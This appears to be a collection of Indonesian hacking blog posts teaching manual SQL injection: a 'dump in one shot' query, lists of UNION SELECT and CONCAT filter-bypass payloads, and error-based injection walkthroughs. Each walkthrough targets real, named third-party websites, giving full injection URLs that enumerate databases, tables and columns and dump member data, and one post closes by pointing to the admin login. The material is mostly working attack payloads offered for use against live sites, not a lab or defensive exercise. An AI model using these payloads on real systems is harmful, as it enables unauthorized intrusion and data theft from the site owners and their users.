DIOS ( Dump In One Shot )

Dalam SQL manual ini ada yang nama nya Query DIOS (Dump In One Shot) yang artinya Dump dalam satu tindakkan . jadi disini kita bisa mengetahui semua tabel" dan column menyeluruh dengan satu tindakkan. langsung saja yah kawan.

1. Disini saya sudah mempunyai target VULN SQLi.

http://bbspeb.com/main/customer.php?id=43'

2. kita lakukan Order By seperti biasa.


http://bbspeb.com/main/customer.php?id=-43 order by 1--+  ( normal )
http://bbspeb.com/main/customer.php?id=-43 order by 2--+  ( normal )
http://bbspeb.com/main/customer.php?id=-43 order by 3--+  ( normal )
http://bbspeb.com/main/customer.php?id=-43 order by 4--+  ( normal )
http://bbspeb.com/main/customer.php?id=-43 order by 5--+  ( normal )
http://bbspeb.com/main/customer.php?id=-43 order by 6--+   ( error )

berarti tabel count nya yang NORMAL sampai 5 .

3. lalu lakukan Union Select seperti biasa.

http://bbspeb.com/main/customer.php?id=-43 union select 1,2,3,4,5--+
Angka ajaibnya yang muncul adalah nomer 4

lalu beri query DIOS dibawah pada angka ajaib yang keluar tersebut.



(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,@tbl_sc:=table_schema,' :: ',@tbl:=table_name,' (Rows ',(select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl),')',column_name), (column_name))))))a)


copy DIOS diatas , lalu pastekan di angka ajaib tersebut lalu ENTER .

Muncul semua deh ^_^ .. tanpa harus capek" membuka satu" table nya.
keterangan :
sebelah tanda :: seperti contoh disitu ada category itu TABLE nya.
dan dibawah itu adalah column nya :)

4. selanjutnya Dump column yang kamu inginkan, kalo dump untuk melihat isi column nya cukup dengan cara seperti biasa saja lah :)

5. Tinggal menuju Login Admin nya deh.

Terima kasih semoga bermanfaat.
Salam hacking

Continue reading

Bypass UNION SELECT FATAL ERROR

Pernahkah kalian , atau jika menemukan penampakkan seperti ini :

ini terjadi pada saya saat UNION SELECT , tapi jangan khawatir kawan. kita lihat yuk cara lewatin begituan hehehe..

saya ada target yang union select nya fatal error. :

http://wwfa.org.uk/article.php?id=-174+union+select+1,2,3,4,5,6,7,8--   ( Fatal error )

supaya bisa menembus Fatal Error tersebut, maka kita lakukan seperti ini :

http://wwfa.org.uk/article.php?id=-174+union+select+1,2,3,4,5,6,7,8-- ( Fatal error )

ubah angka menjadi null secara berurut, seperti ini :

http://wwfa.org.uk/article.php?id=-174 UNION SELECT null,2,3,4,5,6,7,8-- ( Error )
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,null,3,4,5,6,7,8-- ( Error )
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,null,4,5,6,7,8-- ( Error )
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,null,5,6,7,8-- ( Error )
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,null,6,7,8-- ( keluar angka ajaib )

udah gitu ajah sih hehehe..

ada sedikit macam - macam bypass :

Union Select bypassing :


+--+Union+--+Select+--+
+#uNiOn+#sEleCt+
+union+distinct+select+
+union+distinctROW+select+
+union%23aa%0Aselect+
0%a0union%a0select%09
%0Aunion%0Aselect%0A
+UnIoN+SeLselectECT+

/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/
+%2F**%2Funion%2F**%2Fselect+

+UnIoN/*&a=*/SeLeCT/*&a=*/

+%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ 

Concat bypassing :

group_concat()
grOUp_ConCat(/*!*/,0x3e,/*!*/)
group_concat(,0x3c62723e)
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29 

CoNcAt()
concat()
CoNcAt()
CONCAT(DISTINCT )
concat(0x3a,,0x3c62723e)
/*!50000cOnCat*/

concat_ws()
concat_ws(0x3a,)
CONCAT_WS(CHAR(32,58,32),version(),) 

REVERSE(tacnoc)

binary(version())

uncompress(compress(version()))

aes_decrypt(aes_encrypt(version(),1),1) 




 

oke terima kasih semoga bermanfaat ^_^ .

By : Ahmad Fathony

Continue reading

Pesan Error Based SQL injection

    

       Pernahkah anda saat melakukan / mencari target SQL injection, tapi ketika diberi string tanda petik satu ( ' ) itu pesan error nya yang muncul tidak seperti biasanya ? alias tidak sama dengan pesan Syntax error.
malah muncul pesan errornya begini :

1.  Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/cxpqublo/public_html/news_view.php on line 29

 

jangan khawatir, itu bisa kamu inject kok :) ..

disini saya mempunyai satu live target yang kebetulan pesan error nya begitu .

http://www.kidstoryhouse.com.tw/news_view.php?id=10'

string order by :

http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+1--  ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+2--  ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+3--  ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+4--  ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+5--  ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+6--  ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+7--  ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+8--  ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+9--  ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+10-- ( malah muncul pesan error )

         Nah kalau muncul pesan errornya di 10 , berarti column count normalnya 9. kenapa begitu karena itu menunjukkan kalo di tabel 10 muncul pesan error karena tidak ada tabel 10 . jadinya muncul pesan error.
lalu kamu lanjut saja ke UNION SELECT seperti biasa.

ada lagi yaitu ketika kita masukan tanda petik satu ( ' ) yang muncul pesan errornya begini :

2. Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/citcoweb/public_html/news_view.php on line 36

disini saya mempunyai satu live target yang kebetulan pesan error nya begitu .

http://www.citcochandigarh.com/news_view.php?id=4'

string order by :

http://www.citcochandigarh.com/news_view.php?id=4+order+by+1--  ( gak ada respon )

http://www.citcochandigarh.com/news_view.php?id=4+order+by+2--  ( gak ada respon )

http://www.citcochandigarh.com/news_view.php?id=4+order+by+3--  ( gak ada respon )

http://www.citcochandigarh.com/news_view.php?id=4+order+by+4--  ( gak ada respon )

http://www.citcochandigarh.com/news_view.php?id=4+order+by+5--  ( gak ada respon )

http://www.citcochandigarh.com/news_view.php?id=4+order+by+100--  ( gak ada respon )


pertanyaan nya , kenapa kok sampai 100 juga tidak ada apa apa ? terus apa yang harus di modifikasi ?
ini jawabannya :

string order by :

 http://www.citcochandigarh.com/news_view.php?id=4'+order+by+1--+  ( gak ada respon )
 http://www.citcochandigarh.com/news_view.php?id=4'+order+by+2--+  ( gak ada respon )
 http://www.citcochandigarh.com/news_view.php?id=4'+order+by+3--+  ( gak ada respon )
 http://www.citcochandigarh.com/news_view.php?id=4'+order+by+4--+  ( gak ada respon )
 http://www.citcochandigarh.com/news_view.php?id=4'+order+by+5--+  ( gak ada respon )
 http://www.citcochandigarh.com/news_view.php?id=4'+order+by+6--+  ( gak ada respon )
 http://www.citcochandigarh.com/news_view.php?id=4'+order+by+7--+  ( gak ada respon )
 http://www.citcochandigarh.com/news_view.php?id=4'+order+by+8--+  ( muncul pesan error )

keterangan :
pada order by ke 8 itu muncul pesan error, karena tidak ada tabel ke 8 , berarti itu web column count normalnya 8..
terus tanda petik satu ( ' ) sesudah angka 4 kok masih nyantol ? itu karena untuk mengetahui / memunculkan pesan error ketika tabel tidak ada , jadi intinya itu web tabelnya sampai 7. dan untuk tanda + untuk apa saya kurang tahu hehehe.. intinya jangan lupakan itu.

lanjut ke UNION SELECT seperti biasa, tapi jangan hilangkan tanda petik satu ( ' ) dan tanda plus ( + ) biarkan itu nyantol disitu hehehe.

       Udah segitu ajah dulu yah kawan. dilanjut sama posting berikutnya.

By : Ahmad fathony

Continue reading

Error Based SQL injection

Kebutuhan :

1. Dork SQL injection  Lihat

2. Hackbar Add-ons  Pasang

Langkah - Langkah :

Saya sudah mempunyai live target vuln :

http://bearforest.com.tw/news_view.php?id=6

selanjutnya kita beri tanda petik ' di akhir url. guna untuk mengetahui itu vuln atau tidak.

 pesan errornya :

" SQL語法錯誤： select * from preferential where DELETE_ID=0 and ITEM ='6'' 

錯 誤訊息：You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''6''' at line 1 "

Berarti jelas websitenya ada celah untuk kita Inject.

+ Kemudian tambahkan perintah : order+by+ dan -- pada akhir url

http://bearforest.com.tw/news_view.php?id=6'+order+by+1--+   ( ini no error )

http://bearforest.com.tw/news_view.php?id=6'+order+by+2--+   ( ini no error )

http://bearforest.com.tw/news_view.php?id=6'+order+by+3--+   ( ini no error )

http://bearforest.com.tw/news_view.php?id=6'+order+by+4--+   ( ini no error )

http://bearforest.com.tw/news_view.php?id=6'+order+by+5--+   ( ini no error )

http://bearforest.com.tw/news_view.php?id=6'+order+by+6--+   ( ini no error )

dan seterusnya sampai menemukan error nya, seperti saya error nya disini :

http://bearforest.com.tw/news_view.php?id=6'+order+by+16--+
 

berarti validnya hanya sampai pada "16" (Column Count is 16)
nah, disini kita masuk pada tahap lanjutnya.
kita akan mencari angka ajaib pada websitenya :D

kita lakukan langkah berikutnya dengan perintah berikut.

http://bearforest.com.tw/news_view.php?id=-6'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+

disini saya angka ajaib yang muncul yakni angka "14"

+ kemudian kita akan mengecek versi Database, Version, data direktori, dan user.

masukkan perintah :

http://bearforest.com.tw/news_view.php?id=-6'+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(database(),0x0a,version(),0x0a,@@datadir,0x0a,@@hostname,0x0a,user()),15--+

database()

version()

@@datadir

@@hostname

user()

+ untuk melihat semua database yang ada pada web target :

http://bearforest.com.tw/news_view.php?id=-6'+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(0x3c62723e,schema_name),15+from+information_schema.schemata--+

+ Kemudian kita akan mencari table databasenya

perintahnya yaitu : "group_concat(table_name)" dan from+information_schema.tables+where+table_schema=database()--" 

http://bearforest.com.tw/news_view.php?id=-6'+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(0x3c62723e,table_name),15+from+information_schema.tables+where+table_schema=database()--+

+ Sesudah itu kita akan coba melihat kolom dari table yang kita inginkan.

disini saya ingin melihat kolom dari tabel " sys_group "

disini kita perlu encode string HEX dengan hack bar, masukkan nama table yang ingin kamu encode.

sys_group hasil encode nya = 7379735f67726f7570 , disini kita harus tambahkan 0x didepan encodenya. jadi = 0x7379735f67726f7570

Setelah kita encoding stringnya, langsung saja kita cari kolom dari tablenya.
Perintah yang kita ketikkan yakni : "group_concat(column_name)"

Kemudian di akhir url :

+from+information_schema.columns+where+table_name=0x7379735f67726f7570

ganti "database()--" dengan "0x7379735f67726f7570"
penjelasan :
- 0x (spasi)
- 7379735f67726f7570 adalah "sys_group" yang telah kita encode tadi

http://bearforest.com.tw/news_view.php?id=-6'+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(0x3c62723e,column_name),15+from+information_schema.columns+where+table_name=0x7379735f67726f7570--+

+ Terakhir kita lihat dari kolom table yang kalian mau lihat, disini saya ingin melihat kolom =

 "MEMBER_NUM" dan "GROUP_CONTROL"

ketikkan kode berikut ini : "group_concat(MEMBER_NUM,0x3a,GROUP_CONTROL)" dan "from+sys_group--"

penjelasan : 0x3a ( : ) pembatas.

penjelasan : sys_group itu nama tabel dari kolom diatas.

http://bearforest.com.tw/news_view.php?id=-6'+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(MEMBER_NUM,0x3a,GROUP_CONTROL),15+from+sys_group--+

muncul dah data nya hehehehe..

kalau saya disini live target nya tidak ada TABEL admin nya. jadi ini hanya sekedar contoh dan gambaran.

sekian dan terima kasih.

Continue reading